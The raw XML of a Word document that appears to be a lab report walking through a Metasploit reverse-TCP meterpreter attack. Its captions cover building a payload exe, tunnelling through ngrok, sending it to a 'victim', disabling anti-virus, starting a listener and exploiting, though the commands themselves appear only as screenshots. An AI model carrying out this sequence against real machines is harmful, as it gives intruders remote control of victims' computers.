        <w:t>public Ngrok IP:Port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10758130" w14:textId="7E0A3514" w:rsidR="00E91172" w:rsidRDefault="00E91172" w:rsidP="00E91172">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="274" w:after="206"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404040"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>C. Configure Metasploit Handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A34171" w14:textId="101B4789" w:rsidR="00935A7C" w:rsidRPr="00935A7C" w:rsidRDefault="00935A7C" w:rsidP="00935A7C">
      <w:r w:rsidRPr="002C5650">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01941529" wp14:editId="5D65AC09">
            <wp:extent cx="6083300" cy="58997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BB6F" w14:textId="77777777" w:rsidR="00E91172" w:rsidRDefault="00000000" w:rsidP="00E91172">
      <w:pPr>
        <w:spacing w:before="480" w:after="480"/>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="15F2AAB8">
          <v:rect id="_x0000_i1025" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="#404040" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAF4E0A" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="765186DC" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Starting the Metasploit-framework:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AF8CBA" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59B67723" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="004F57B4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62F5CEDA" wp14:editId="0B0D6DEB">
            <wp:extent cx="6083300" cy="5932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310" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11B6457E" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18949CBC" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="184DA759" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7619CD02" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="005D13B4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D3E995B" wp14:editId="058DE864">
            <wp:extent cx="6083300" cy="590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119" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EC8F12A" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DD88D02" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17A65AC6" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Creating the payload with this command: that contains a reverse_tcp_meterpreter Shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F5179F" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C9829B8" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="004F3784">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3018FDE0" wp14:editId="49D04108">
            <wp:extent cx="6083300" cy="59029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5476" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A05D377" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C8E303C" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15DD2386" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="004F3784">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="555BB4C2" wp14:editId="3A32630C">
            <wp:extent cx="6083300" cy="44653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8838" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F7EC38E" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D20F80E" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14D8DFEB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2D7603">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Send the exe to victim:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F13020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740ACB6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072EC5D8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Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2868AF89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C4575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A0EA4C4" wp14:editId="5ED3D223">
            <wp:extent cx="6083300" cy="5735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D9DC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B0CA483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F101C65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9729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F3167DF" wp14:editId="256ACA14">
            <wp:extent cx="6083300" cy="5711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0A43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37C6F53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67C7ABD3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217B456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Method1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126E3CA8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A19C4C9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9729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D722AE" wp14:editId="345A36A4">
            <wp:extent cx="6083300" cy="54590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1EFF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874FD85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B2EABD6" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRPr="002D7603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38830663" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRPr="00681283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681283">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sending it to the victim machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1598CF0C" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="224BB2FD" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D1E4D28" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="002F6411">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03EF0BB9" wp14:editId="04A15908">
            <wp:extent cx="6083300" cy="58585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C8AE" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A598A30" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78171825" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Disabling the anti-virus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290632F0" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DDCDF73" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D753CCE" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25AA98C2" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Transferring the payload.exe to the victim machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB30FDD" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C744C68" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="004A462A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CE12A73" wp14:editId="25264D81">
            <wp:extent cx="6083300" cy="57619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F152" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="106DB1D5" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B4BE017" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="004A462A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49780B87" wp14:editId="1D5F26B1">
            <wp:extent cx="6083300" cy="5697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B68A" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FC779FE" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>The payload file is successfully transferred to the victim successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129FBF0C" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1570E49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4A462A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Turning on listener</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FD1A71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6EC2862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3CD60E72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9C179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5C1650" wp14:editId="75D0D5DF">
            <wp:extent cx="6083300" cy="29679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F2E4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2171FF9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231DB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67A9D1E8" wp14:editId="78E6A1E5">
            <wp:extent cx="6083300" cy="5277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2C5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619E3C1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231DB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Exploitation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E730C41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6EA9D64D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048F4D2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2C5650">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42DDCE9E" wp14:editId="524C6A20">
            <wp:extent cx="6083300" cy="5899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6F9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B5A9DDC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3E66E3C1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2C56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902896" wp14:editId="2D71EFF7">
            <wp:extent cx="6083300" cy="5870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2CFF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B96E9DB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679671BD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1196512E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3C40F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70F98AC" wp14:editId="7C60ABF6">
            <wp:extent cx="6083300" cy="58775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0C4E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12A5E7D4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01BB5B2E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  <w:r w:rsidRPr="003C40F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3B20663" wp14:editId="7FABCDEA">
            <wp:extent cx="6083300" cy="5812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98CE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6AE3C6F1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3F53ED8C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11CCF50B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EE17106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9B9DEB4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AA16C0A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DBAB4DD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7EB97E70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2D348E24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43DD3DE" w14:textId="77777777" w:rsidR="000A5BA8" w:rsidRDefault="000A5BA8" w:rsidP="000A5BA8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="577A065C" w14:textId="77777777" w:rsidR="002E7D11" w:rsidRDefault="002E7D11">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6070"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="002E7D11">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="15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45A06"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DF66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83636F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CB6A5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3E2CF2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DD629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A355B8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="71AC5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1306A9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="74A43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5F4D6D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="32288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967293"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="825C7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6B70BD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9E582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48D5167"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2FF2D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866D39"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CB562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524411">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="867840558">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1022511300">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1159690654">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1877346321">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="469901201">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1139299011">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1422680088">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="917980528">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="5660391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noPunctuationKerning/>
  <w:characterSpacingControl w:val="doNotCompress"/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697"/>
    <w:rsid w:val="00034C11"/>
    <w:rsid w:val="00041043"/>
    <w:rsid w:val="00050865"/>
    <w:rsid w:val="0005740A"/>
    <w:rsid w:val="000738B1"/>
    <w:rsid w:val="00083394"/>
    <w:rsid w:val="000A5293"/>
    <w:rsid w:val="000A5BA8"/>
    <w:rsid w:val="000B4C9A"/>
    <w:rsid w:val="000C7F90"/>
    <w:rsid w:val="001038A8"/>
    <w:rsid w:val="00113787"/>
    <w:rsid w:val="00166816"/>
    <w:rsid w:val="00172A27"/>
    <w:rsid w:val="00185BCB"/>
    <w:rsid w:val="001928B6"/>
    <w:rsid w:val="00192B1C"/>
    <w:rsid w:val="001A3D26"/>
    <w:rsid w:val="001E1B26"/>
    <w:rsid w:val="0020467A"/>
    <w:rsid w:val="0021242B"/>
    <w:rsid w:val="0023750E"/>
    <w:rsid w:val="002732B1"/>
    <w:rsid w:val="002A4533"/>
    <w:rsid w:val="002E7D11"/>
    <w:rsid w:val="003734AA"/>
    <w:rsid w:val="003E1F7B"/>
    <w:rsid w:val="003F2D3A"/>
    <w:rsid w:val="00405066"/>
    <w:rsid w:val="00420076"/>
    <w:rsid w:val="0044460A"/>
    <w:rsid w:val="00461DEC"/>
    <w:rsid w:val="004A6BA4"/>
    <w:rsid w:val="005151ED"/>
    <w:rsid w:val="00545584"/>
    <w:rsid w:val="005A47CB"/>
    <w:rsid w:val="005A7306"/>
    <w:rsid w:val="005B5F9B"/>
    <w:rsid w:val="005F74A3"/>
    <w:rsid w:val="00604F6F"/>
    <w:rsid w:val="00613BD0"/>
    <w:rsid w:val="00632C2E"/>
    <w:rsid w:val="006418B0"/>
    <w:rsid w:val="00654058"/>
    <w:rsid w:val="00660BEF"/>
    <w:rsid w:val="0066447B"/>
    <w:rsid w:val="0068766C"/>
    <w:rsid w:val="006A512C"/>
    <w:rsid w:val="006B4594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B0A26"/>
    <w:rsid w:val="008B7D61"/>
    <w:rsid w:val="008F787A"/>
    <w:rsid w:val="00914DA2"/>
    <w:rsid w:val="00935A7C"/>
    <w:rsid w:val="009A7E0C"/>
    <w:rsid w:val="009F4288"/>
    <w:rsid w:val="00A02CB8"/>
    <w:rsid w:val="00A17DDF"/>
    <w:rsid w:val="00A83133"/>
    <w:rsid w:val="00AA179F"/>
    <w:rsid w:val="00AA19EE"/>
    <w:rsid w:val="00AA6857"/>
    <w:rsid w:val="00AC2ACA"/>
    <w:rsid w:val="00AD255F"/>
    <w:rsid w:val="00AE38AB"/>
    <w:rsid w:val="00B47539"/>
    <w:rsid w:val="00BE30CD"/>
    <w:rsid w:val="00C8711B"/>
    <w:rsid w:val="00CB7EE2"/>
    <w:rsid w:val="00CC5230"/>
    <w:rsid w:val="00CF0D7D"/>
    <w:rsid w:val="00D0578B"/>
    <w:rsid w:val="00D15CB4"/>
    <w:rsid w:val="00D22F66"/>
    <w:rsid w:val="00D33D2E"/>
    <w:rsid w:val="00D73A63"/>
    <w:rsid w:val="00D76D1E"/>
    <w:rsid w:val="00D805F0"/>
    <w:rsid w:val="00E00CC7"/>
    <w:rsid w:val="00E14B2E"/>
    <w:rsid w:val="00E23C35"/>
    <w:rsid w:val="00E60653"/>
    <w:rsid w:val="00E91172"/>
    <w:rsid w:val="00EB27C6"/>
    <w:rsid w:val="00F05E04"/>
    <w:rsid w:val="00F35BD9"/>
    <w:rsid w:val="00F4510F"/>
    <w:rsid w:val="00F70AF3"/>
    <w:rsid w:val="00F7377B"/>
    <w:rsid w:val="00F942C1"/>
    <w:rsid w:val="00FE1808"/>
    <w:rsid w:val="10DF5797"/>
    <w:rsid w:val="1A102B7A"/>
    <w:rsid w:val="1B9872C5"/>
    <w:rsid w:val="376A21EF"/>
    <w:rsid w:val="3C41537E"/>
    <w:rsid w:val="3CF92149"/>
    <w:rsid w:val="5397428F"/>
    <w:rsid w:val="547B10AD"/>
    <w:rsid w:val="6241261C"/>
    <w:rsid w:val="66A91654"/>
    <w:rsid w:val="67F64068"/>
    <w:rsid w:val="74717DC1"/>
    <w:rsid w:val="766B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B6CF513"/>
  <w15:docId w15:val="{59F05EF9-3CCE-4347-B3DF-FF165C4C0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ind w:left="46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1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ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="41"/>
      <w:ind w:left="1181" w:hanging="361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1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Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="1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117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ds-markdown-paragraph">
    <w:name w:val="ds-markdown-paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00E91172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91172"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="d813de27">
    <w:name w:val="d813de27"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00E91172"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E911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91172"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="token">
    <w:name w:val="token"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00E91172"/>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E911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7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7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9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96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210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61967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250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0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79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7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8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145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10906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763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3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71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2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05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53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2280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88616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8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0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7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85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819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29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58912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3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63694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34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2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192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9834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94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6211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152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2299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97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9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73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41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747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71153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132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73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6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0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025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577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46591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090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2335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7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72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798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949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8645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78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1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5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25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591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5158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04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9446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5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5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1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60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87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751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318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9801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17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851498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25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919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93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31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5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8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9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2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49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18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9749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13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23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355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27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979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7096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59113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693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bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dashboard.ngrok.com/get-started/your-authtoken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19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2</vt:lpstr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2</dc:title>
  <dc:subject>Conversion of Galvanometer</dc:subject>
  <dc:creator>Microsoft unt</dc:creator>
  <cp:lastModifiedBy>Muhammad Sohaib Rafiq</cp:lastModifiedBy>
  <cp:revision>55</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-29T07:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-09T10:37:00Z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2057-12.2.0.19821</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="ICV">
    <vt:lpwstr>B8BF61D6719E4979BAAE20FAE7ED1CC9_12</vt:lpwstr>
  </property>
</Properties>
</file>